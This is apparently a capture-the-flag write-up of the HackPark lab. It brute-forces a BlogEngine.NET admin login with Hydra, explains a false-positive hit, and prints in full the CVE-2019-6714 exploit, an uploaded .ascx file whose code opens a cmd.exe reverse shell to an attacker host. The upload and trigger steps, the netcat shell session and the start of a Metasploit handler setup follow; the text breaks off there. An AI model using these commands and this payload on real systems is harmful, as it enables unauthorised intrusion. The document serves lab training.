[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "789456" - 134 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "999999" - 135 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "shorty" - 136 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "11111" - 137 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "nathan" - 138 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "snoopy" - 139 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "gabriel" - 140 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "hunter" - 141 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "cherry" - 142 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "killer" - 143 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "sandra" - 144 of 14344399 [child 15] (0/0)
[80][http-post-form] host: 10.10.174.239 login: penywise password: <div><embed src=\\
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-01-25 01:38:03
OK, logging in with penywise and the password Hydra reported (<div><embed src=\\) shows the following on the page:
hackpark
Ooops! An unexpected error has occurred.
This one's down to me! Please accept my apologies for this. I'll see to it that the developer responsible for this happening is given 20 lashes (but only after he has fixed this problem).
HOME
ARCHIVE
CONTACT US
LOG IN
Apparently that was not the user. The hit was a false positive: the candidate password contains HTML markup, the server answered with its error page instead of the login form, and since that page does not contain the failure string "Login failed", Hydra counted the response as a success.
Looking up information on the movie's actors as possible usernames to feed to Hydra:
********
Anderson
Visitor1
Jonathan
Stephenk
hackpark
Anderson
Kaspbrak
penywise
adminwis
admintim
admin123
Hanscom
Brandon
Stephen
Brandis
Annette
Richard
Visitante1
administrator
ssh root@10.10.125.241
hydra -l Visitor1 -P /usr/share/wordlists/rockyou.txt 10.10.174.239 -V http-post-form "/login.aspx?ReturnURL=%2fADMIN:__VIEWSTATE=^VIEWSTATE^&__EVENTVALIDATION=^EVENTVALIDATION^&ctl00$MainContent$LoginUser$UserName=^USER^&ctl00$MainContent$LoginUser$Password=^PASS^&ctl00$MainContent$LoginUser$LoginButton=Iniciar+sesi%C3%B3n:Login failed"
/Account/login.aspx?ReturnURL=/admin/
hydra -l admin123 -P /usr/share/wordlists/rockyou.txt 10.10.174.239 -V http-post-form "/login.aspx?ReturnURL=%2fADMIN:__VIEWSTATE=dafpnMH9%2B6gv3LceL517447DIxmcC8ATtGxFhL93mAkZEoPPlRJ20nNhMZKFERhcbAMatYsNIivOlT2%2FX3AYWMhPH4fCes1Oc15Sm7t6YyWSQnD8MV0PyjP4k6HvglMK77kUSSi1Yhmn7mSF84IYEbW02BFi1AR3AmDEzU0zkzDgiVMP&__EVENTVALIDATION=Tjy94c85ufC73iZyte%2FPDZ1wB3D%2FbqLg4CRmlxqrVc5R4hj36C5Bb7B7hxN%2BwoqOKdG3MY4wFOYEKmxK0llq5tR%2BfoH%2FaDZaCmLcetK3p2WcZilb1WhcAvapfCdSVZuwjR6GqkST3kB0jOBMUmUczpJEPM6FVMz6GprsZYk6NNAzXB3t&ctl00$MainContent$LoginUser$UserName=^USER^&ctl00$MainContent$LoginUser$Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Iniciar+sesi%C3%B3n:Login failed"
Second attempts:
hydra -l admin123 -P /usr/share/wordlists/rockyou.txt 10.10.118.10 -V http-post-form "/login.aspx?ReturnURL=%2fADMIN:__VIEWSTATE=dafpnMH9%2B6gv3LceL517447DIxmcC8ATtGxFhL93mAkZEoPPlRJ20nNhMZKFERhcbAMatYsNIivOlT2%2FX3AYWMhPH4fCes1Oc15Sm7t6YyWSQnD8MV0PyjP4k6HvglMK77kUSSi1Yhmn7mSF84IYEbW02BFi1AR3AmDEzU0zkzDgiVMP&__EVENTVALIDATION=Tjy94c85ufC73iZyte%2FPDZ1wB3D%2FbqLg4CRmlxqrVc5R4hj36C5Bb7B7hxN%2BwoqOKdG3MY4wFOYEKmxK0llq5tR%2BfoH%2FaDZaCmLcetK3p2WcZilb1WhcAvapfCdSVZuwjR6GqkST3kB0jOBMUmUczpJEPM6FVMz6GprsZYk6NNAzXB3t&ctl00$MainContent$LoginUser$UserName=^USER^&ctl00$MainContent$LoginUser$Password=^PASS^&ctl00$MainContent$LoginUser$LoginButton=Iniciar+sesi%C3%B3n&Login=Login:Login failed"
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.118.10 -V http-post-form "/Account/login.aspx?ReturnURL=%2fADMIN:__VIEWSTATE=dafpnMH9%2B6gv3LceL517447DIxmcC8ATtGxFhL93mAkZEoPPlRJ20nNhMZKFERhcbAMatYsNIivOlT2%2FX3AYWMhPH4fCes1Oc15Sm7t6YyWSQnD8MV0PyjP4k6HvglMK77kUSSi1Yhmn7mSF84IYEbW02BFi1AR3AmDEzU0zkzDgiVMP&__EVENTVALIDATION=Tjy94c85ufC73iZyte%2FPDZ1wB3D%2FbqLg4CRmlxqrVc5R4hj36C5Bb7B7hxN%2BwoqOKdG3MY4wFOYEKmxK0llq5tR%2BfoH%2FaDZaCmLcetK3p2WcZilb1WhcAvapfCdSVZuwjR6GqkST3kB0jOBMUmUczpJEPM6FVMz6GprsZYk6NNAzXB3t&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Iniciar+sesi%C3%B3n&Login=Login:Login failed"
hydra -l admin123 -P /usr/share/wordlists/rockyou.txt 10.10.174.239 -V http-post-form "/Account/login.aspx?ReturnURL=%2fADMIN:__VIEWSTATE=dafpnMH9%2B6gv3LceL517447DIxmcC8ATtGxFhL93mAkZEoPPlRJ20nNhMZKFERhcbAMatYsNIivOlT2%2FX3AYWMhPH4fCes1Oc15Sm7t6YyWSQnD8MV0PyjP4k6HvglMK77kUSSi1Yhmn7mSF84IYEbW02BFi1AR3AmDEzU0zkzDgiVMP&__EVENTVALIDATION=Tjy94c85ufC73iZyte%2FPDZ1wB3D%2FbqLg4CRmlxqrVc5R4hj36C5Bb7B7hxN%2BwoqOKdG3MY4wFOYEKmxK0llq5tR%2BfoH%2FaDZaCmLcetK3p2WcZilb1WhcAvapfCdSVZuwjR6GqkST3kB0jOBMUmUczpJEPM6FVMz6GprsZYk6NNAzXB3t&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Iniciar+sesi%C3%B3n:Login failed"
--------------------
This command worked. We forced the login form into English, captured with Burp Suite the request sent to the server by POST, and loaded the Hydra command line with that request exactly as captured, adding the ^USER^ and ^PASS^ placeholders and, at the end, ":Login failed" so that Hydra can tell when a response is a success. Note that the earliest attempts also wrote the field names with a bare $ inside double quotes, which the shell expands; the captured request uses %24 instead. This is the one that worked:
Third attempts:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.118.10 http-post-form "/Account/login.aspx?ReturnURL=%2fADMIN:__VIEWSTATE=yMdTectXM180sGrMQRYRPem1MJwWGFuXuPKA9l%2BBCclkFuO%2BxH3KYmLqPnHDjg4mJPQ1jWnOkbDybhszy4T9h2fN1w%2FNe5mG896wrHe8BX8WzBCsiSvtf1C0rJ8N%2FhouRYA4NqPL%2BsIqZOFMN%2BXbpoUW%2Fk9cGWAHd%2FnenUzXkzXBmbc0X%2BZBcYdHl9OdlT9z1yV4TQkbM8RFyIpDfxRVG1nW1dcci0hpEe3A99MaczpR8ndT8UJ4S1bZe9h0ej7VwDiX0HAcRsqUhEL1KzhUNhHsOl3fJrU5F2iGHqREd6V69NkLvXGB49A70NSzmKQAb70Gv0d3147LXKP7evBebBLGmc%2FNJytU2QhAW%2FGD02pvBdzY&__EVENTVALIDATION=bi37l8LK6qtoJBEMdZxChvQ2dCz7R%2BhtOVWqrwONeRLD6Ig6ySpQAUn5neJ21KiutOHYBBcOrUeYcdW5HCOQgO5MJYEszT7n8IlZDqxI8jeKYYnMl2v75kd%2FVSVZ7MousVLHhX%2BB6HgBps2D%2B1HO3OJJwwEu5WoD1C9amzvn%2F4la9uHF&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed" -V
We got the admin password:
┌──(root㉿kali)-[~]
└─# hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.118.10 http-post-form "/Account/login.aspx?ReturnURL=%2fADMIN:__VIEWSTATE=yMdTectXM180sGrMQRYRPem1MJwWGFuXuPKA9l%2BBCclkFuO%2BxH3KYmLqPnHDjg4mJPQ1jWnOkbDybhszy4T9h2fN1w%2FNe5mG896wrHe8BX8WzBCsiSvtf1C0rJ8N%2FhouRYA4NqPL%2BsIqZOFMN%2BXbpoUW%2Fk9cGWAHd%2FnenUzXkzXBmbc0X%2BZBcYdHl9OdlT9z1yV4TQkbM8RFyIpDfxRVG1nW1dcci0hpEe3A99MaczpR8ndT8UJ4S1bZe9h0ej7VwDiX0HAcRsqUhEL1KzhUNhHsOl3fJrU5F2iGHqREd6V69NkLvXGB49A70NSzmKQAb70Gv0d3147LXKP7evBebBLGmc%2FNJytU2QhAW%2FGD02pvBdzY&__EVENTVALIDATION=bi37l8LK6qtoJBEMdZxChvQ2dCz7R%2BhtOVWqrwONeRLD6Ig6ySpQAUn5neJ21KiutOHYBBcOrUeYcdW5HCOQgO5MJYEszT7n8IlZDqxI8jeKYYnMl2v75kd%2FVSVZ7MousVLHhX%2BB6HgBps2D%2B1HO3OJJwwEu5WoD1C9amzvn%2F4la9uHF&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed" -V
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-26 00:33:27
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.118.10:80/Account/login.aspx?ReturnURL=%2fADMIN:__VIEWSTATE=yMdTectXM180sGrMQRYRPem1MJwWGFuXuPKA9l%2BBCclkFuO%2BxH3KYmLqPnHDjg4mJPQ1jWnOkbDybhszy4T9h2fN1w%2FNe5mG896wrHe8BX8WzBCsiSvtf1C0rJ8N%2FhouRYA4NqPL%2BsIqZOFMN%2BXbpoUW%2Fk9cGWAHd%2FnenUzXkzXBmbc0X%2BZBcYdHl9OdlT9z1yV4TQkbM8RFyIpDfxRVG1nW1dcci0hpEe3A99MaczpR8ndT8UJ4S1bZe9h0ej7VwDiX0HAcRsqUhEL1KzhUNhHsOl3fJrU5F2iGHqREd6V69NkLvXGB49A70NSzmKQAb70Gv0d3147LXKP7evBebBLGmc%2FNJytU2QhAW%2FGD02pvBdzY&__EVENTVALIDATION=bi37l8LK6qtoJBEMdZxChvQ2dCz7R%2BhtOVWqrwONeRLD6Ig6ySpQAUn5neJ21KiutOHYBBcOrUeYcdW5HCOQgO5MJYEszT7n8IlZDqxI8jeKYYnMl2v75kd%2FVSVZ7MousVLHhX%2BB6HgBps2D%2B1HO3OJJwwEu5WoD1C9amzvn%2F4la9uHF&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed
[80][http-post-form] host: 10.10.118.10 login: admin password: 1qaz2wsx
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-01-26 00:33:49
Credentials: admin:1qaz2wsx
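Why the first Hydra hit (penywise / <div><embed src=\\) was a false positive while the second (admin / 1qaz2wsx) was genuine, as an added example that is not part of the original writeup. fake_login is a constructed model of the responses seen on the page (not BlogEngine code); the HTTP status codes and the cookie name are assumptions.

```python
"""
With http-post-form and ':Login failed' as the failure condition, hydra
treats ANY response that lacks that string as a success. A candidate
password containing markup never reaches the login code: the server
answers with its error page ('Ooops! ...'), the failure string is absent,
and hydra reports a hit. A real login looks different: a redirect to
ReturnURL plus an authentication cookie.
"""
from dataclasses import dataclass
from typing import Optional

FAILURE_MARKER = "Login failed"
VALID_CREDENTIALS = {"admin": "1qaz2wsx"}   # the writeup's final result


@dataclass
class Response:
    status: int
    body: str
    set_cookie: Optional[str] = None


def fake_login(user: str, password: str) -> Response:
    """Constructed stand-in for /Account/login.aspx (assumption, not BlogEngine)."""
    # Observed on the page: a value that looks like HTML produces the site's
    # generic error page instead of the login form (typically ASP.NET request
    # validation rejecting the form value before the login handler runs).
    if "<" in user or "<" in password:
        return Response(500, "<h1>Ooops! An unexpected error has occurred.</h1>")
    if VALID_CREDENTIALS.get(user) == password:
        # A genuine login redirects to ReturnURL and issues a session cookie
        # (cookie name constructed for this example).
        return Response(302, "", set_cookie=".AUXBLOGENGINE=constructed-token")
    return Response(200, "<form>... Login failed ...</form>")


def hydra_failure_rule(resp: Response) -> bool:
    """hydra's failure-string rule: 'hit' whenever the marker is absent."""
    return FAILURE_MARKER not in resp.body


def verified_success(resp: Response) -> bool:
    """Require positive evidence of a session (redirect + cookie) and no
    failure marker, so an error page no longer counts as a hit."""
    if FAILURE_MARKER in resp.body:
        return False
    return resp.status == 302 and resp.set_cookie is not None


def classify(user: str, password: str) -> dict:
    """Compare the two interpretations of one login response."""
    resp = fake_login(user, password)
    return {
        "status": resp.status,
        "hydra_says_hit": hydra_failure_rule(resp),
        "verified": verified_success(resp),
    }


if __name__ == "__main__":
    for u, p in [("penywise", "<div><embed src=\\\\"),
                 ("admin", "1qaz2wsx"),
                 ("admin", "123456")]:
        print(u, repr(p), classify(u, p))
```

The only hit that survives verification is the one the author confirmed by actually logging in; the penywise "hit" is an error page that merely lacks the failure string.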
--------------------
Information from the web admin panel:
LOG FILE:
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
Date: 8/3/2019 11:48:59 AM
Utils.Recycle() : Access to the path 'C:\inetpub\wwwroot\web.config' is denied.
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
Date: 8/4/2019 3:09:56 PM
BlogEngine.Core.Packaging.Installer.InstallPackage(HeavyMetal): Access to the path 'C:\inetpub\wwwroot\Custom\Themes\HeavyMetal' is denied.
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
Date: 8/4/2019 3:09:56 PM
Can not find any files installed for package: HeavyMetal
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
Date: 8/4/2019 3:09:56 PM
Error unistalling package HeavyMetal: No files to uninstall
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
Date: 8/4/2019 3:09:56 PM
PUT http://192.168.1.124/api/packages/install/HeavyMetal: No files to uninstall
Profile:
Administrator
Roles: Administrators
CHANGE PICTURE REMOVE PICTURE
Display Name
Administrator
First Name
Admin
Last Name
CUSTOM FIELD
We look for an exploit for the BlogEngine 3.3.6 service on Exploit-DB and with searchsploit:
┌──(root㉿kali)-[~]
└─# searchsploit BlogEngine 3.3.6
------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------ ---------------------------------
BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution | aspx/webapps/46353.cs
BlogEngine.NET 3.3.6/3.3.7 - 'dirPath' Directory Traversal / Remote Code Exec | aspx/webapps/47010.py
BlogEngine.NET 3.3.6/3.3.7 - 'path' Directory Traversal | aspx/webapps/47035.py
BlogEngine.NET 3.3.6/3.3.7 - 'theme Cookie' Directory Traversal / Remote Code | aspx/webapps/47011.py
BlogEngine.NET 3.3.6/3.3.7 - XML External Entity Injection | aspx/webapps/47014.py
------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
---------
We look up the exploit on Exploit-DB, create an .ascx file with the name the exploit indicates and its code inside, set our IP and the port we will later listen on with netcat, save the file and upload it through the post editor in the admin panel. Then we browse to the URL the exploit also indicates, which executes it, and our netcat receives the reverse shell. Not very interactive, but we are in:
EXPLOIT:
# Exploit Title: BlogEngine.NET <= 3.3.6 Directory Traversal RCE
# Date: 02-11-2019
# Exploit Author: Dustin Cobb
# Vendor Homepage: https://github.com/rxtur/BlogEngine.NET/
# Software Link: https://github.com/rxtur/BlogEngine.NET/releases/download/v3.3.6.0/3360.zip
# Version: <= 3.3.6
# Tested on: Windows 2016 Standard / IIS 10.0
# CVE : CVE-2019-6714
/*
* CVE-2019-6714
*
* Path traversal vulnerability leading to remote code execution. This
* vulnerability affects BlogEngine.NET versions 3.3.6 and below. This
* is caused by an unchecked "theme" parameter that is used to override
* the default theme for rendering blog pages. The vulnerable code can
* be seen in this file:
*
* /Custom/Controls/PostList.ascx.cs
*
* Attack:
*
* First, we set the TcpClient address and port within the method below to
* our attack host, who has a reverse tcp listener waiting for a connection.
* Next, we upload this file through the file manager. In the current (3.3.6)
* version of BlogEngine, this is done by editing a post and clicking on the
* icon that looks like an open file in the toolbar. Note that this file must
* be uploaded as PostView.ascx. Once uploaded, the file will be in the
* /App_Data/files directory off of the document root. The admin page that
* allows upload is:
*
* http://10.10.10.10/admin/app/editor/editpost.cshtml
*
*
* Finally, the vulnerability is triggered by accessing the base URL for the
* blog with a theme override specified like so:
*
* http://10.10.10.10/?theme=../../App_Data/files
*
*/
<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
<%@ Import Namespace="BlogEngine.Core" %>
<script runat="server">
    static System.IO.StreamWriter streamWriter;
    protected override void OnLoad(EventArgs e) {
        base.OnLoad(e);
        using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("10.10.10.20", 4445)) {
            using(System.IO.Stream stream = client.GetStream()) {
                using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
                    streamWriter = new System.IO.StreamWriter(stream);
                    StringBuilder strInput = new StringBuilder();
                    System.Diagnostics.Process p = new System.Diagnostics.Process();
                    p.StartInfo.FileName = "cmd.exe";
                    p.StartInfo.CreateNoWindow = true;
                    p.StartInfo.UseShellExecute = false;
                    p.StartInfo.RedirectStandardOutput = true;
                    p.StartInfo.RedirectStandardInput = true;
                    p.StartInfo.RedirectStandardError = true;
                    p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
                    p.Start();
                    p.BeginOutputReadLine();
                    while(true) {
                        strInput.Append(rdr.ReadLine());
                        p.StandardInput.WriteLine(strInput);
                        strInput.Remove(0, strInput.Length);
                    }
                }
            }
        }
    }
    private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
        StringBuilder strOutput = new StringBuilder();
        if (!String.IsNullOrEmpty(outLine.Data)) {
            try {
                strOutput.Append(outLine.Data);
                streamWriter.WriteLine(strOutput);
                streamWriter.Flush();
            } catch (Exception err) { }
        }
    }
</script>
<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>
We create the file and upload it:
┌──(root㉿kali)-[~]
└─# nano exploitpaimon.aspx
┌──(root㉿kali)-[~]
└─# mv exploitpaimon.aspx PostView.ascx
┌──(root㉿kali)-[~]
└─# ls
Desktop Documents Downloads Music Pictures PostView.ascx Public Templates Videos
┌──(root㉿kali)-[~]
└─# chmod +x PostView.ascx
┌──(root㉿kali)-[~]
└─# ls
Desktop Documents Downloads Music Pictures PostView.ascx Public Templates Videos
Then we got the shell in netcat:
┌──(root㉿kali)-[~]
└─# nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.125.241] from (UNKNOWN) [10.10.118.10] 49353
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
dir
c:\windows\system32\inetsrv>dir
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Directory of c:\windows\system32\inetsrv
08/03/2019 10:41 AM <DIR> .
08/03/2019 10:41 AM <DIR> ..
08/03/2019 09:45 AM 111,616 appcmd.exe
07/01/2013 08:49 AM 3,810 appcmd.xml
08/03/2019 09:45 AM 174,592 AppHostNavigators.dll
08/03/2019 09:45 AM 66,048 apphostsvc.dll
08/03/2019 09:45 AM 375,296 appobj.dll
08/03/2019 09:45 AM 130,560 aspnetca.exe
08/03/2019 09:45 AM 39,424 authanon.dll
08/03/2019 09:45 AM 24,576 cachfile.dll
08/03/2019 09:45 AM 49,664 cachhttp.dll
08/03/2019 09:45 AM 13,824 cachtokn.dll
08/03/2019 09:45 AM 13,824 cachuri.dll
08/03/2019 09:45 AM 70,656 certobj.dll
08/03/2019 09:45 AM 50,688 compstat.dll
08/03/2019 09:45 AM <DIR> config
08/03/2019 09:45 AM 42,496 custerr.dll
08/03/2019 09:45 AM 18,432 defdoc.dll
08/03/2019 09:45 AM 22,016 dirlist.dll
08/03/2019 09:45 AM <DIR> en
08/03/2019 09:45 AM <DIR> en-US
08/03/2019 10:14 AM 66,048 filter.dll
08/03/2019 09:45 AM 38,400 gzip.dll
08/03/2019 09:45 AM 19,968 httpmib.dll
08/03/2019 09:45 AM 17,408 hwebcore.dll
08/03/2019 09:45 AM 63,105 iis.msc
08/03/2019 09:45 AM 307,712 iiscore.dll
08/03/2019 09:45 AM 109,056 iisreg.dll
08/03/2019 09:45 AM 229,376 iisres.dll
08/03/2019 09:45 AM 35,328 iisrstas.exe
08/03/2019 09:45 AM 175,616 iissetup.exe
08/03/2019 09:45 AM 61,952 iissyspr.dll
08/03/2019 09:45 AM 14,848 iisual.exe
08/03/2019 09:45 AM 285,184 iisutil.dll
08/03/2019 09:45 AM 546,304 iisw3adm.dll
08/03/2019 10:41 AM 30,720 iis_ssi.dll
08/03/2019 09:45 AM 124,928 InetMgr.exe
08/03/2019 10:14 AM 115,200 isapi.dll
08/03/2019 09:45 AM 32,256 loghttp.dll
08/03/2019 09:45 AM 143,360 Microsoft.Web.Administration.dll
08/03/2019 09:45 AM 1,085,440 Microsoft.Web.Management.dll
08/03/2019 10:14 AM 41,984 modrqflt.dll
08/03/2019 09:45 AM 492,032 nativerd.dll
08/03/2019 09:45 AM 19,456 protsup.dll
08/03/2019 09:45 AM 31,232 rsca.dll
08/03/2019 09:45 AM 52,224 rscaext.dll
08/03/2019 09:45 AM 36,864 static.dll
08/03/2019 09:45 AM 185,344 uihelper.dll
08/03/2019 10:14 AM 18,432 validcfg.dll
08/03/2019 09:45 AM 14,848 w3ctrlps.dll
08/03/2019 09:45 AM 28,160 w3ctrs.dll
08/03/2019 09:45 AM 107,520 w3dt.dll
08/03/2019 09:45 AM 76,800 w3logsvc.dll
08/03/2019 09:45 AM 27,648 w3tp.dll
08/03/2019 09:45 AM 22,528 w3wp.exe
08/03/2019 09:45 AM 70,656 w3wphost.dll
08/03/2019 10:41 AM 29,696 warmup.dll
08/03/2019 09:45 AM 29,184 wbhstipm.dll
08/03/2019 09:45 AM 25,600 wbhst_pm.dll
08/03/2019 09:45 AM 162,816 XPath.dll
55 File(s) 6,182,755 bytes
5 Dir(s) 39,116,738,560 bytes free
sysinfo
c:\windows\system32\inetsrv>sysinfo
whoami
c:\windows\system32\inetsrv>whoami
iis apppool\blog
--------
NOW WE LOOK FOR A MORE STABLE SHELL, ONE FROM WHICH ESCALATING PRIVILEGES IS EASIER. USING METASPLOIT WITH METERPRETER WE SET EVERYTHING UP AND LEAVE MULTI HANDLER LISTENING FOR THE PAYLOAD, WHICH WE MUST CREATE WITH MSFVENOM, UPLOAD TO THE MACHINE THROUGH THE NETCAT SHELL WE ALREADY HAVE, AND RUN SO THAT OUR MULTI HANDLER CATCHES THE CONNECTION AND GIVES US A METERPRETER SESSION:
┌──(root㉿kali)-[~]
└─# msfconsole
Metasploit Park, System Security Interface
Version 4.0.5, Alpha E
Ready...
> access security
access: PERMISSION DENIED.
> access security grid
access: PERMISSION DENIED.
> access main security grid
access: PERMISSION DENIED....and...
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
=[ metasploit v6.2.23-dev ]
+ -- --=[ 2259 exploits - 1188 auxiliary - 402 post ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Use help <command> to learn more
about any command
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search BlogEngine 3.3.6
[-] No results from search
msf6 > search BlogEngine 3.3
[-] No results from search
msf6 > search multi handler
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/local/apt_package_manager_persistence 1999-03-09 excellent No APT Package Manager Persistence
1 exploit/android/local/janus 2017-07-31 manual Yes Android Janus APK Signature bypass
2 auxiliary/scanner/http/apache_mod_cgi_bash_env 2014-09-24 normal Yes Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
3 exploit/linux/local/bash_profile_persistence 1989-06-08 normal No Bash Profile Persistence
4 exploit/linux/local/desktop_privilege_escalation 2014-08-07 excellent Yes Desktop Linux Password Stealer and Privilege Escalation
5 exploit/multi/handler manual No Generic Payload Handler
6 exploit/multi/http/hp_sitescope_uploadfileshandler 2012-08-29 good No HP SiteScope Remote Code Execution
7 exploit/windows/firewall/blackice_pam_icq 2004-03-18 great No ISS PAM.dll ICQ Parser Buffer Overflow
8 exploit/windows/browser/ms05_054_onload 2005-11-21 normal No MS05-054 Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution
9 exploit/windows/browser/ms13_080_cdisplaypointer 2013-10-08 normal No MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free
10 exploit/multi/http/maracms_upload_exec 2020-08-31 excellent Yes MaraCMS Arbitrary PHP File Upload
11 exploit/windows/mssql/mssql_linkcrawler 2000-01-01 great No Microsoft SQL Server Database Link Crawling Command Execution
12 exploit/windows/browser/persits_xupload_traversal 2009-09-29 excellent No Persits XUpload ActiveX MakeHttpRequest Directory Traversal
13 exploit/linux/http/rconfig_ajaxarchivefiles_rce 2020-03-11 good Yes Rconfig 3.x Chained Remote Code Execution
14 auxiliary/dos/http/webrick_regex 2008-08-08 normal No Ruby WEBrick::HTTP::DefaultFileHandler DoS
15 auxiliary/dos/http/squid_range_dos 2021-05-27 normal No Squid Proxy Range Header DoS
16 exploit/linux/http/trendmicro_websecurity_exec 2020-06-10 excellent Yes Trend Micro Web Security (Virtual Appliance) Remote Code Execution
17 exploit/multi/http/wp_ait_csv_rce 2020-11-14 excellent Yes WordPress AIT CSV Import Export Unauthenticated Remote Code Execution
18 exploit/linux/local/yum_package_manager_persistence 2003-12-17 excellent No Yum Package Manager Persistence
Interact with a module by name or index. For example info 18, use 18 or use exploit/linux/local/yum_package_manager_persistence
msf6 > use 5
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > search payload meterpreter
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/android/meterpreter_reverse_http normal No Android Meterpreter Shell, Reverse HTTP Inline
1 payload/android/meterpreter_reverse_https normal No Android Meterpreter Shell, Reverse HTTPS Inline
2 payload/android/meterpreter_reverse_tcp normal No Android Meterpreter Shell, Reverse TCP Inline
3 payload/android/meterpreter/reverse_http normal No Android Meterpreter, Android Reverse HTTP Stager
4 payload/android/meterpreter/reverse_https normal No Android Meterpreter, Android Reverse HTTPS Stager
5 payload/android/meterpreter/reverse_tcp normal No Android Meterpreter, Android Reverse TCP Stager
6 exploit/multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection
7 payload/apple_ios/aarch64/meterpreter_reverse_http normal No Apple_iOS Meterpreter, Reverse HTTP Inline
8 payload/apple_ios/armle/meterpreter_reverse_http normal No Apple_iOS Meterpreter, Reverse HTTP Inline
9 payload/apple_ios/aarch64/meterpreter_reverse_https normal No Apple_iOS Meterpreter, Reverse HTTPS Inline
10 payload/apple_ios/armle/meterpreter_reverse_https normal No Apple_iOS Meterpreter, Reverse HTTPS Inline
11 payload/apple_ios/aarch64/meterpreter_reverse_tcp normal No Apple_iOS Meterpreter, Reverse TCP Inline
12 payload/apple_ios/armle/meterpreter_reverse_tcp normal No Apple_iOS Meterpreter, Reverse TCP Inline
